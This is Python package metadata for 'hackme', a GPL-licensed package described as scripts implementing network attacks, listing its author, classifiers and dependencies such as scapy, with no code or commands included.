Metadata-Version: 2.1
Name: hackme
Version: 1.0.0
Summary: Scripts that implement different network attacks
Author-email: Nadzeya Hutsko <nadzya.info@gmail.com>
License: GPL-3.0 license
Project-URL: Homepage, https://github.com/nadzyah/hackme
Project-URL: Bug Tracker, https://github.com/nadzyah/hackme/issues
Classifier: Environment :: Console
Classifier: Intended Audience :: Telecommunications Industry
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: System Administrators
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.10
Classifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)
Classifier: Operating System :: POSIX :: Linux
Requires-Python: >=3.10
License-File: LICENSE
Requires-Dist: pylintfileheader
Requires-Dist: scapy
Requires-Dist: wikipedia
